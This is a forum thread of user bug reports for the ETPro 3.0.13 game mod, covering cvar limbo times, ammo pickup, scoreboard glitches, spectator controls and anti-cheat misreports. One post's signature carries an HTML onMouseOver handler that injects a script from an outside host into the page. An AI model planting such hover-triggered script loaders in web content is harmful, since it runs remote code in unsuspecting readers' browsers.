ETPro Test Bug Fix 3.0.13 bugs

Discussion for any ET/ETPro/BayonET bugs or cheats you find...

Moderators: Forum moderators, developers

[DD]ZeDoX

ETPro Test Bug Fix 3.0.13 bugs

Post by [DD]ZeDoX »

forcecvar g_red/bluelimbotime are screwed.

also, players can pick up ammo even if they dont need it. (NOT AMMO crates, just weapons)
Kami

Re: ETPro Test Bug Fix 3.0.13 bugs

Post by Kami »

[DD]ZeDoX wrote:also, players can pick up ammo even if they dont need it. (NOT AMMO crates, just weapons)
that has always happened
IdNotFound

Post by IdNotFound »

My reports:

Scoreboard shows up blank sometimes. Yet, this is not always. Seems to be happening when you are spectating specific people. Sometimes the scoreboard shows up A LOOOOT lagged, sometimes it just doesn't (or the lag would be bigger than the respawn).

On those same players, +attack for following next player does not work. Yet, weapalt for following previous player DOES work (!!).

And it seems that I get some Illegible server messages quite often when changing maps. It prints out random numbers as I recall, it's not always the same message. Not even sure if they are all the Illegible... one, but I am getting errors and then I got a click and related it to the new bugfix. Can't say if they were there before, I couldn't pub on any bugfix until now.
Image nZ/IdNotFound
NaZGûL TeaM Leader
SAWL Tech Staff
defragga

Post by defragga »

The stuff with the scoreboard is here too AND a problem with the anti cheat tool:

When I use atitool 0.0.20 and corecenter (every version), I dont get a clean win xp message, when I type in /cheaters

corecenter is a program designed to control all my fans I got on my motherboard (msi corecell technology)

:}
Rain

Re: ETPro Test Bug Fix 3.0.13 bugs

Post by Rain »

[DD]ZeDoX wrote:forcecvar g_red/bluelimbotime are screwed.
They're latched for a reason...
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
vision

Post by vision »

IdNotFound wrote:My reports:

Scoreboard shows up blank sometimes. Yet, this is not always. Seems to be happening when you are spectating specific people. Sometimes the scoreboard shows up A LOOOOT lagged, sometimes it just doesn't (or the lag would be bigger than the respawn).
yea sometimes when u spect some1 with lag or somethink, the scoreboard is emty
bani
Site Admin

Post by bani »

please post 3.0.13 bugs to this thread!